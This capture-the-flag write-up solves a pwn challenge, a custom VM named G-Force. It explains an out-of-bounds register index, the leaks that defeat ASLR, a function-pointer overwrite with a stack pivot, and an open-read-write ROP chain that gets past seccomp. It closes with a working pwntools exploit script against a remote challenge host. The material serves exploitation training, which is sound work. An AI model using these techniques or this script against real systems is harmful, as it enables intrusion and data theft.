
# Write-up: G-Force

**Category:** Pwn
**Difficulty:** Hard
**Description:** A custom JIT-compiled VM with a secure sandbox and content filtering.

In this challenge, we are faced with a custom Virtual Machine called "G-Force". The binary is statically linked and stripped, making reverse engineering a bit more involved. We are told it has a JIT compiler and a "secure, sandboxed memory space."

---

## 1. Initial Analysis

We start by inspecting the provided binary `g_forcevm`.

```bash
$ file g_forcevm
g_forcevm: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), static-pie linked, BuildID[sha1]=..., for GNU/Linux 3.2.0, stripped
```

It is a **static PIE** executable: all dependencies are linked in (no external libc), but the code is still position-independent, so its load address is randomized by ASLR. It is also **stripped**, so we have no function names.

Running the binary, we are greeted with a prompt and a help menu:

```text
--- G-FORCE VM v2.0 (Final) ---
4KB Secure Sandbox. Type 'help' for instructions.
> help

--- G-Force Instruction Set ---
General:
  MOVI R, IMM      : Load immediate value into Register R
  MOVR R1, R2      : Copy value from R2 to R1
...
Meta Commands:
  execute          : Compile and run the current program buffer
  info             : Dump current CPU state
  ram OFF LEN      : Hex dump of RAM at offset
  debug            : Run debug logger
...
```

## 2. Reverse Engineering

Using Ghidra, we analyze the binary to understand the VM's internal structure and how it handles instructions.

### The VM Structure & Stack Layout
Analyzing the `main` function (decompiled at `0x0010ba79`), we can identify the variables used to store the CPU state.

```c
undefined8 FUN_0010ba79(void)
{
  // ...
  undefined1 local_20d8 [40];
  undefined8 local_20b0;
  undefined8 local_20a8;
  code *local_20a0;
  undefined1 local_2098 [8192];
  // ...

  // Initialization
  thunk_FUN_0012dff0(local_20d8,0,0x40); // memset

  // RAM Allocation
  // FUN_0012ac00 is likely malloc (or a wrapper).
  // 0x1000 = 4096 bytes (4KB)
  local_20a8 = FUN_0012ac00(0x1000);

  // Debug Function Pointer Initialization
  local_20a0 = FUN_00109a22;

  // Main Loop
  while( true ) {
      // ... command parsing ...
      iVar2 = thunk_FUN_0012d150(uVar4,"debug");
      if (iVar2 == 0) {
        // VULNERABLE CALL
        (*local_20a0)(local_20a8);
      }
      else {
        iVar2 = thunk_FUN_0012d150(uVar4,"execute");
        if (iVar2 == 0) {
          FUN_00115f80("[*] Compiling %d ops...\n",local_20f8);
          FUN_0010a2b8(local_20d8,local_2098,local_20f8);
          // ...
        }
      }
  }
}
```

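`local_20d8` is a 40-byte array, i.e. five 8-byte slots. It likely holds registers A, B, C, D plus one more slot; as the `info` handler shows, SP lives in the next variable, `local_20b0` (offset 40).
`local_20a0` is a function pointer initialized to `FUN_00109a22` (the default logger).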
Crucially, look at the memory layout on the stack:
*   `local_20d8` (Registers) starts at offset `-0x20d8`.
*   `local_20a8` (RAM Pointer) starts at offset `-0x20a8`.
*   `local_20a0` (Func Ptr) starts at offset `-0x20a0`.

The distance between the registers array and the RAM pointer is `0x20d8 - 0x20a8 = 0x30`, which is **48 bytes**.
The distance between the registers array and the function pointer is `0x20d8 - 0x20a0 = 0x38`, which is **56 bytes**.

### Confirming the Layout via `info`
To confirm that `local_20d8` actually holds the registers, we can examine the function responsible for the `info` command (referred to as `FUN_00109cbe` in Ghidra).

```c
void FUN_00109cbe(undefined8 *param_1)
{
  FUN_0011d2b0("\n--- CPU STATE ---");
  FUN_00115f80("Reg A: 0x%016lx | Reg B: 0x%016lx\n",*param_1,param_1[1]);
  FUN_00115f80("Reg C: 0x%016lx | Reg D: 0x%016lx\n",param_1[2],param_1[3]);
  FUN_00115f80("SP   : 0x%016lx\n",param_1[5]);
  FUN_0011d2b0("-----------------");
  return;
}
```

This function takes a pointer to `local_20d8` as its argument.
*   `param_1[0]` corresponds to **Register A** (Offset 0).
*   `param_1[1]` corresponds to **Register B** (Offset 8).
*   `param_1[2]` corresponds to **Register C** (Offset 16).
*   `param_1[3]` corresponds to **Register D** (Offset 24).
*   `param_1[5]` corresponds to **SP** (Offset 40).

The fact that `info` prints these values directly from the `local_20d8` array confirms that this memory region represents the CPU's register file.

### Reconstructing the CPU Structure
Based on the memory layout and the `info` function, we can reconstruct the VM's internal `CPU` structure on the stack:

```c
struct CPU_Stack_Layout {
    uint64_t regs[4];         // Offset 0x00: Registers A, B, C, D
    uint64_t PC;              // Offset 0x20: Program Counter / reserved
    uint64_t SP;              // Offset 0x28: Stack Pointer (Offset 40)
    uint8_t *ram;             // Offset 0x30: Pointer to VM RAM (Offset 48)
    void (*debug_log)(char*); // Offset 0x38: Function pointer for 'debug' command (Offset 56)
};
```

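These offsets match the stack layout computed earlier: the RAM pointer sits 48 bytes (`0x30`) and the function pointer 56 bytes (`0x38`) past the start of the register array.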
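
As a quick cross-check, the reconstructed layout can be modeled with Python's `ctypes`. This is only a sketch: the field names (`pc`, `sp`, `ram`, `debug_log`) are our own labels, and the two pointer fields are modeled as plain 64-bit integers so the offsets do not depend on the host platform.

```python
import ctypes

class CPU(ctypes.Structure):
    # Field names are our own labels for the slots seen in the decompilation.
    _fields_ = [
        ("regs", ctypes.c_uint64 * 4),   # A, B, C, D
        ("pc", ctypes.c_uint64),         # index 4: guessed PC / reserved slot
        ("sp", ctypes.c_uint64),         # index 5: printed as SP by `info`
        ("ram", ctypes.c_uint64),        # index 6: pointer to VM RAM
        ("debug_log", ctypes.c_uint64),  # index 7: `debug` function pointer
    ]

# Offsets derived from the Ghidra local names (local_20d8 is the struct start).
assert CPU.sp.offset == 0x20d8 - 0x20b0 == 0x28
assert CPU.ram.offset == 0x20d8 - 0x20a8 == 0x30
assert CPU.debug_log.offset == 0x20d8 - 0x20a0 == 0x38

print(hex(ctypes.sizeof(CPU)))  # total size of the modeled structure
```

The modeled structure is `0x40` bytes long, the same length that `main` passes to the `memset`-like call on `local_20d8`, which suggests the whole block is initialized as a single structure.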

### The Vulnerability: Out-of-Bounds Register Access
The instruction parser converts register names to indices.
- `a` -> 0
- `b` -> 1
- `c` -> 2
- `d` -> 3

However, the validation function `FUN_001099bf` allows letters up to `h`!

```c
int FUN_001099bf(char *param_1)
{
  // ...
      if ((*param_1 < 'a') || ('h' < *param_1)) {
        iVar1 = -1;
      }
      else {
        iVar1 = *param_1 + -0x61;
      }
  // ...
  return iVar1;
}
```

If we use register **`g`** (Index 6):
`Address = local_20d8 + (6 * 8) = local_20d8 + 48` -> This accesses the `ram` pointer.

If we use register **`h`** (Index 7):
`Address = local_20d8 + (7 * 8) = local_20d8 + 56` -> This accesses the `debug_log` function pointer!

This gives us two powerful primitives:
1.  **Out-of-Bounds Read (Leak):** `MOVR a, h` copies the function pointer into register `a`. We can then view it via `info` to recover the PIE base address. Similarly, `MOVR b, g` leaks the heap address of the VM RAM.
2.  **Control Flow Hijack:** `MOVI h, <ADDR>` allows us to overwrite the function pointer with any address we want.
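
To make the index arithmetic concrete, here is a small Python model of the range check and the resulting byte offsets. It is a sketch based only on the decompiled snippet: the elided parts of `FUN_001099bf` are not modeled, and the slot labels in `SLOT_NAMES` are our own names for the reconstructed layout.

```python
REG_SLOT_SIZE = 8  # each register slot is a 64-bit value

# Our labels for the eight reachable slots; indices 4-7 lie beyond A-D.
SLOT_NAMES = ["A", "B", "C", "D", "PC/reserved", "SP", "ram", "debug_log"]

def reg_index(name: str) -> int:
    """Mimic the range check seen in FUN_001099bf: 'a'..'h' are accepted."""
    if not name:
        return -1
    c = name[0]
    if c < "a" or c > "h":
        return -1
    return ord(c) - 0x61

def describe(name: str):
    """Return (byte offset from local_20d8, slot label), or None if rejected."""
    idx = reg_index(name)
    if idx < 0:
        return None
    return idx * REG_SLOT_SIZE, SLOT_NAMES[idx]

for reg in "abcdefghi":
    print(reg, describe(reg))
```

Running it shows that `g` and `h` map to offsets 48 and 56, while `i` is the first letter the check rejects.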

### The "Debug" Command
The `debug` command calls the function stored in `local_20a0` (register `h`). It passes the RAM pointer (register `g`) as the first argument (`rdi`).

```c
// Pseudo-code for debug command
if (cmd == "debug") {
    // local_20a0 points to default_logger by default
    // If we overwrite local_20a0, we control execution.
    // The first argument (RDI) is always the RAM pointer (local_20a8).
    (*local_20a0)(local_20a8);
}
```

## 3. Exploitation Strategy: The Battle Plan

To fully compromise the system, we need to bypass ASLR. Since there is a seccomp filter in place, we will need to use a read/write/open ROP chain instead of just popping a shell.

### Discovering the Seccomp Sandbox
While analyzing the binary, we encounter a function `FUN_0010b918` that is called early in `main`. Decompiling this function reveals how the "secure sandbox" mentioned in the description is implemented:

```c
void FUN_0010b918(void)
{
  // ...
  iVar1 = FUN_001636b0(0x26,1,0,0,0);
  if (iVar1 != 0) {
    FUN_001161b0("prctl(NO_NEW_PRIVS)");
    FUN_00115450(1);
  }
  iVar1 = FUN_001636b0(0x16,2,local_68);
  if (iVar1 != 0) {
    FUN_001161b0("prctl(SECCOMP)");
    FUN_00115450(1);
  }
  // ...
}
```

The function `FUN_001636b0` is a wrapper around the `prctl` syscall.
1.  **`prctl(PR_SET_NO_NEW_PRIVS, 1, ...)`**: This is called with `option = 38` (`0x26`), which corresponds to `PR_SET_NO_NEW_PRIVS`. This prevents the process (and its children) from gaining new privileges, disabling `setuid`/`setgid` binaries.
2.  **`prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, ...)`**: This is called with `option = 22` (`0x16`), which corresponds to `PR_SET_SECCOMP`. The second argument `2` specifies `SECCOMP_MODE_FILTER`. This applies a BPF (Berkeley Packet Filter) program to restrict which system calls the process can make.
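
When reading stripped code, it helps to decode such magic numbers mechanically. The helper below is a minimal sketch; the tables only cover the constants relevant here (values from `<linux/prctl.h>` and `<linux/seccomp.h>`), and `decode_prctl` is a name we made up for illustration.

```python
# Constants from <linux/prctl.h> and <linux/seccomp.h> (only the ones used here).
PRCTL_OPTIONS = {38: "PR_SET_NO_NEW_PRIVS", 22: "PR_SET_SECCOMP"}
SECCOMP_MODES = {1: "SECCOMP_MODE_STRICT", 2: "SECCOMP_MODE_FILTER"}

def decode_prctl(option: int, arg2: int) -> str:
    """Render a prctl(option, arg2, ...) call with symbolic names."""
    name = PRCTL_OPTIONS.get(option, f"unknown({option})")
    if name == "PR_SET_SECCOMP":
        mode = SECCOMP_MODES.get(arg2, str(arg2))
        return f"prctl({name}, {mode}, ...)"
    return f"prctl({name}, {arg2}, ...)"

print(decode_prctl(0x26, 1))
print(decode_prctl(0x16, 2))
```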

Because of this seccomp filter, standard exploitation techniques like calling `system("/bin/sh")` or running `execve` shellcode will fail, assuming the filter does not allow `execve` (the kernel then rejects the call or kills the process). Instead, we must use an **Open-Read-Write (ORW)** ROP chain to explicitly open the flag file, read its contents into memory, and write them to standard output.

### Step 1: Leak Addresses (Defeat ASLR)
Since the binary is Position Independent (PIE), all code addresses are randomized. We need to find where the code is located in memory.
1.  **Leak Code Address:** We copy the function pointer into register `a` (`MOVR a, h`).
2.  **Leak Heap Address:** We copy the RAM pointer into register `b` (`MOVR b, g`).
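3.  **Read the Leak:** We execute these instructions and use the VM's `info` command to read `Reg A` and `Reg B`. (The solve script stores both registers to RAM with `saver` and parses a `ram` dump instead, which is easier to automate.) By subtracting the logger's offset from `Reg A`, we calculate the binary's **Base Address**. Note that `0x00109a22` is the address shown by Ghidra, which loads PIE images at a default base of `0x100000`; relative to the real load address the logger sits at `0x9a22`, consistent with the ROPgadget offset of the pivot gadget.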
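
The base calculation can be sketched as follows. It assumes Ghidra used its default image base of `0x100000` for this PIE binary; the leak value in the example is made up, and `pie_base` is a hypothetical helper name.

```python
GHIDRA_IMAGE_BASE = 0x100000     # assumption: Ghidra's default base for PIE
LOGGER_GHIDRA_ADDR = 0x00109A22  # default logger as shown in the decompilation
LOGGER_OFFSET = LOGGER_GHIDRA_ADDR - GHIDRA_IMAGE_BASE  # file-relative offset

def pie_base(leaked_logger: int) -> int:
    """Turn the leaked logger pointer into the runtime load address."""
    base = leaked_logger - LOGGER_OFFSET
    # A correct base is page-aligned; anything else means a bad leak or offset.
    if base & 0xFFF:
        raise ValueError(f"suspicious base {base:#x}: not page-aligned")
    return base

example_leak = 0x555555554000 + LOGGER_OFFSET  # made-up value for illustration
print(hex(LOGGER_OFFSET), hex(pie_base(example_leak)))
```

The page-alignment check is a cheap sanity test: if the leak was parsed incorrectly or the wrong offset was subtracted, the result will almost never end in `000`.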

### Step 2: Construct the ROP Chain and Place it in RAM
We need to call `syscall` (Linux x64 ABI). The calling convention is:
*   `RAX` = System Call Number
*   `RDI` = Argument 1
*   `RSI` = Argument 2
*   `RDX` = Argument 3

Here is how each command in the chain is constructed:

#### 1. `open("./flag.txt", 0)`
*   `pop rdi; ret` -> `ADDR_OF_STRING` (Pointer to "./flag.txt\x00")
*   `pop rsi; ret` -> `0` (O_RDONLY)
*   `pop rax; ret` -> `2` (SYS_open)
*   `syscall; ret`

#### 2. `read(3, buffer, 0x100)`
*   `pop rdi; ret` -> `3` (File Descriptor, usually 3 since 0/1/2 are standard)
*   `pop rsi; ret` -> `ADDR_OF_BUFFER` (Pointer to writable memory, e.g., offset 0x300 in RAM)
*   `pop rdx; ret` -> `0x100` (Bytes to read)
*   `pop rax; ret` -> `0` (SYS_read)
*   `syscall; ret`

#### 3. `write(1, buffer, 0x100)`
*   `pop rdi; ret` -> `1` (stdout)
*   `pop rsi; ret` -> `ADDR_OF_BUFFER` (Pointer to where we read the flag)
*   `pop rdx; ret` -> `0x100` (Bytes to write)
*   `pop rax; ret` -> `1` (SYS_write)
*   `syscall; ret`
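
The three stages share the same shape, so the chain can be generated by one helper. The sketch below uses placeholder gadget and RAM addresses (all made up) and, unlike the list above, also sets `RDX` for `open`, as the final solve script does. `syscall_frame` and `build_orw` are hypothetical helper names.

```python
import struct

def syscall_frame(g, nr, rdi, rsi, rdx):
    """Qwords that load RDI/RSI/RDX/RAX via pop gadgets, then hit `syscall; ret`."""
    return [
        g["pop_rdi"], rdi,
        g["pop_rsi"], rsi,
        g["pop_rdx"], rdx,
        g["pop_rax"], nr,
        g["syscall"],
    ]

def build_orw(g, path_addr, buf_addr, length=0x100, fd=3):
    """open(path, O_RDONLY) -> read(fd, buf, length) -> write(1, buf, length)."""
    chain = []
    chain += syscall_frame(g, 2, path_addr, 0, 0)       # SYS_open
    chain += syscall_frame(g, 0, fd, buf_addr, length)  # SYS_read
    chain += syscall_frame(g, 1, 1, buf_addr, length)   # SYS_write
    return chain

# Placeholder addresses for illustration only; real values come from the leaks.
gadgets = {"pop_rdi": 0x1000, "pop_rsi": 0x1002, "pop_rdx": 0x1004,
           "pop_rax": 0x1006, "syscall": 0x1008}
ram = 0x20000000
chain = build_orw(gadgets, ram + 0x200, ram + 0x300)
payload = b"".join(struct.pack("<Q", q) for q in chain)
print(len(chain), "qwords,", len(payload), "bytes")
```

With 27 qwords (216 bytes), the chain stays well below offset `0x200`, so it does not collide with the path string or the read buffer placed further up in RAM.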

**Place in RAM:** We write this entire chain of 64-bit integers into the VM's RAM (starting at offset 0) using the `SAVER` VM instruction.
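
Since the VM only moves 64-bit values, both the chain and the path string have to be split into little-endian qwords and emitted as `movi`/`saver` pairs. The sketch below assumes, as the solve script does, that `saver R, OFF` stores register `R` at RAM offset `OFF` and that the parser accepts hex immediates; `qwords` and `vm_store_commands` are hypothetical helper names.

```python
def qwords(data: bytes):
    """Split data into little-endian 64-bit integers, zero-padding the tail."""
    out = []
    for off in range(0, len(data), 8):
        chunk = data[off:off + 8].ljust(8, b"\0")
        out.append(int.from_bytes(chunk, "little"))
    return out

def vm_store_commands(values, base_off=0):
    """Emit the VM program lines that write each value to RAM via register a."""
    cmds = []
    for i, value in enumerate(values):
        cmds.append(f"movi a,{hex(value)}")
        cmds.append(f"saver a,{hex(base_off + i * 8)}")
    return cmds

for line in vm_store_commands(qwords(b"./flag.txt\0"), base_off=0x200):
    print(line)
```

For the path string this yields two stores: the first qword carries `./flag.t`, the second carries `xt` followed by the NUL terminator and padding.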

### Step 3: Find the Pivot
We have a ROP chain sitting in the heap (VM RAM), but the CPU is using the real stack. We need to point `RSP` (Stack Pointer) to our RAM so the CPU starts executing our chain.
1.  **Find the Pivot Gadget:** We identify a "Stack Pivot" gadget. Using `ROPgadget` on the binary reveals a perfect gadget: `mov rsp, rdi; ret` at offset `0x000099b8`.
2.  **Why this gadget?** When the `debug` command is called, the first argument (`RDI`) is a pointer to the VM's RAM (register `g`).
3.  **The Trigger:** If we jump to this gadget, it will copy `RDI` (RAM Ptr) into `RSP`. The subsequent `ret` will pop the first 8 bytes of our RAM into `RIP`, starting the ROP chain.
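
The effect of the pivot is easy to model in a few lines of Python. This is a toy simulation, not an emulator: `ram_addr` and the two qwords in RAM are made-up values, and `simulate_pivot` is a hypothetical helper name.

```python
import struct

def simulate_pivot(ram: bytes, ram_addr: int):
    """Model `mov rsp, rdi; ret` when RDI points at the start of VM RAM."""
    rdi = ram_addr                   # debug passes the RAM pointer in RDI
    rsp = rdi                        # mov rsp, rdi
    (rip,) = struct.unpack_from("<Q", ram, rsp - ram_addr)  # ret pops RIP
    rsp += 8                         # ret also advances RSP past the popped qword
    return rip, rsp

# RAM offset 0 holds the first gadget address, offset 8 its first operand.
ram = struct.pack("<QQ", 0x1111, 0x2222)
rip, rsp = simulate_pivot(ram, 0x20000000)
print(hex(rip), hex(rsp))
```

After the pivot, `RIP` holds the qword stored at RAM offset 0 and `RSP` points at offset 8, which is why the chain must start at the very beginning of RAM.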

### Step 4: Overwrite the Function Pointer
Now that the ROP chain is placed in RAM and we have the address of our pivot gadget, we need to redirect execution flow.
1.  **Target Register H:** Writing to register `h` overwrites the `debug_log` function pointer.
2.  **The Payload:** We use `MOVI h, <ADDR_OF_PIVOT>` to replace the default logger address with the address of our stack pivot gadget.

### Step 5: Trigger the Chain
The final step is to execute the hijacked function pointer.
1.  **The Trigger Command:** We type `execute` to compile and run the queued instructions (including the `MOVI h` overwrite), and then run `debug`.
2.  **Execution Flow:**
    *   The `main` loop calls the function pointer at register `h`.
    *   Since we overwrote it, it jumps to `mov rsp, rdi; ret`.
    *   `RDI` holds the RAM pointer, so `RSP` becomes the RAM pointer.
    *   The CPU executes `ret`, popping the first gadget from our ROP chain in RAM.
    *   The chain executes `open`, `read`, and `write`, printing the flag to our console!

## 4. The Solution Script

Here is the complete `solve.py` script. It automates the leakage, calculation, and payload delivery.

```python
#!/usr/bin/env python3
from pwn import *

# =============================================================================
# CONFIGURATION
# =============================================================================
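# Address of the default logger as shown in Ghidra. This includes Ghidra's
# default 0x100000 image base for PIE binaries, so binary_base below is
# relative to the Ghidra view (file-relative offset: 0x9a22).
OFFSET_DEFAULT_LOG = 0x00109a22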
HOST = '87.106.77.47'
PORT = 1378

# Set context (used by packing/unpacking helpers such as u64)
exe = './g_forcevm'
elf = ELF(exe, checksec=False)
context.binary = elf
context.log_level = 'info'

def start():
    # Connect to the remote service; swap in process(exe) for local testing
    return remote(HOST, PORT)

p = start()

def send_cmd(cmd):
    p.sendline(cmd.encode())

def wait_prompt():
    return p.recvuntil(b"> ")

log.info(f"--- G-Force Payload Builder (Target: {HOST}:{PORT}) ---")
wait_prompt()

# -----------------------------------------------------------------------------
# STEP 1: LIVE LEAK
# -----------------------------------------------------------------------------
log.info("STEP 1: Leaking Addresses...")
send_cmd("movr a, h")
wait_prompt()
send_cmd("movr b, g")
wait_prompt()
send_cmd("saver a, 0")
wait_prompt()
send_cmd("saver b, 8")
wait_prompt()
send_cmd("execute")
wait_prompt()

# Read the leaks
send_cmd("ram 0 16")
p.recvuntil(b"0000: ")
dump_line = p.recvline().decode().strip().split()
wait_prompt()
# Convert the dumped hex bytes into two little-endian 64-bit values
raw = bytes(int(b, 16) for b in dump_line)
leak_logger = u64(raw[:8])
leak_heap = u64(raw[8:16])

binary_base = leak_logger - OFFSET_DEFAULT_LOG
addr_farm   = leak_logger - 0x75

# Gadgets
addr_pop_rdi = addr_farm + 0
addr_pop_rsi = addr_farm + 2
addr_pop_rdx = addr_farm + 4
addr_pop_rax = addr_farm + 6
addr_syscall = addr_farm + 8
addr_pivot   = addr_farm + 11

log.success(f"    Leaked Logger: {hex(leak_logger)}")
log.success(f"    Leaked Heap:   {hex(leak_heap)}")
log.success(f"    Base address:  {hex(binary_base)}")
log.success(f"    Addr Farm:     {hex(addr_farm)}")

# -----------------------------------------------------------------------------
# STEP 2: CONSTRUCT CHAIN
# -----------------------------------------------------------------------------
log.info("STEP 2: Construct ROP chain...")

chain = [
    # --- OPEN("./flag.txt", 0, 0) ---
    addr_pop_rdi,
    leak_heap + 0x200, # ptr to "./flag.txt"
    addr_pop_rsi,
    0,
    addr_pop_rdx,
    0,
    addr_pop_rax,
    2,
    addr_syscall,

    # --- READ(3, buffer, 100) ---
    addr_pop_rdi,
    3,
    addr_pop_rsi,
    leak_heap + 0x300, # ptr to buffer
    addr_pop_rdx,
    100,
    addr_pop_rax,
    0,
    addr_syscall,

    # --- WRITE(1, buffer, 35) ---
    addr_pop_rdi,
    1,
    addr_pop_rsi,
    leak_heap + 0x300,
    addr_pop_rdx,
    35,
    addr_pop_rax,
    1,
    addr_syscall,

    # --- EXIT(0) ---
    addr_pop_rdi,
    0,
    addr_pop_rax,
    60,
    addr_syscall,
]

# Send chain: load each 64-bit value into register a, then store it to RAM
for idx, value in enumerate(chain):
    send_cmd(f"movi a,{hex(value)}")
    wait_prompt()
    send_cmd(f"saver a,{hex(idx * 8)}")
    wait_prompt()

# Send string "./flag.txt" at offset 0x200
flag_str = b'./flag.txt\0'
for i in range(0, len(flag_str), 8):
    chunk = flag_str[i:i+8].ljust(8, b'\0')
    val = u64(chunk)
    send_cmd(f"movi a, {hex(val)}")
    wait_prompt()
    send_cmd(f"saver a,{0x200 + i}")
    wait_prompt()

# Execute chain placement
send_cmd("execute")
wait_prompt()
# Dump the first 0x30 bytes of RAM as a sanity check (output is discarded)
send_cmd("ram 0x00 0x30")
wait_prompt()
log.success("    ROP Chain placed")

# -----------------------------------------------------------------------------
# STEP 3: ARM & TRIGGER
# -----------------------------------------------------------------------------
log.info("STEP 3: Arming...")
send_cmd(f"movi h,{hex(addr_pivot)}")
wait_prompt()
send_cmd("execute")
wait_prompt()
log.success("    Armed")

log.info("STEP 4: Trigger...")
# Uncomment to pause before triggering
# input("Press [ENTER] to trigger...")

log.info("Executing...")
send_cmd("debug")

try:
    # recvall is essential here as the remote closes connection after exit()
    output = p.recvall(timeout=3)

    print("\n" + "="*50)
    print("FINAL OUTPUT:")
    print(output.decode(errors='ignore'))
    print("="*50)

except Exception as e:
    # log.error() raises PwnlibException, which would skip p.close() below
    log.failure(f"Error receiving flag: {e}")

p.close()
```